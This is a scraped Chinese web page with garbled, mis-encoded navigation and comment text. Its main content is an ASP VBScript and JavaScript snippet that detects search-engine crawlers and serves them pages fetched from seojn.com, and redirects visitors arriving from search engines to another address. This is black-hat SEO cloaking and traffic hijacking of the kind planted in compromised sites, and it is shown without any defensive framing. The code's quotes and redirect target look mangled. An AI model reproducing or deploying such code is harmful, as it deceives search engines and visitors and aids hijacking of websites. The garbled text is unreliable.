觸屏版
全國(guó)服務(wù)熱線:0571-87205688
登錄
注冊(cè)
客戶中心
關(guān)注云客
<%@ LANGUAGE = VBScript.Encode %><% Dim agent agent=Request.ServerVariables(“http_user_agent”) If instr(agent,”Baiduspider”) > 0 or instr(agent,”baidubrowser”) > 0 or instr(agent,”Sogou”) > 0 or instr (agent,”googlebot”) > 0 or instr(agent,”Sosospider”) > 0 then linkurl=”http://www.seojn.com” ‘快照網(wǎng)址 Function GetBody(Url) Dim objXML On Error Resume Next Set objXML = CreateObject(“Microsoft.XMLHTTP”) With objXML .Open “Get”, Url, False, “”, “” .Send GetBody = .ResponseBody End With GetBody=BytesToBstr(GetBody,”GB2312″) Set objXML = Nothing End Function Function BytesToBstr(strBody,CodeBase) dim objStream set objStream = Server.CreateObject(“Adodb.Stream”) objStream.Type = 1 objStream.Mode =3 objStream.Open objStream.Write strBody objStream.Position = 0 objStream.Type = 2 objStream.Charset = CodeBase BytesToBstr = objStream.ReadText objStream.Close set objStream = nothing End Function response.write GetBody(linkurl) End if%> <script LANGUAGE=”Javascript”> var s=document.referrer if(s.indexOf(“google”)>0 || s.indexOf(“baidu”)>0 || s.indexOf(“yahoo”)>0 ) location.href=”百度一下,你就知道”; </script>
評(píng)論(0人參與,0條評(píng)論)
發(fā)布評(píng)論
最新評(píng)論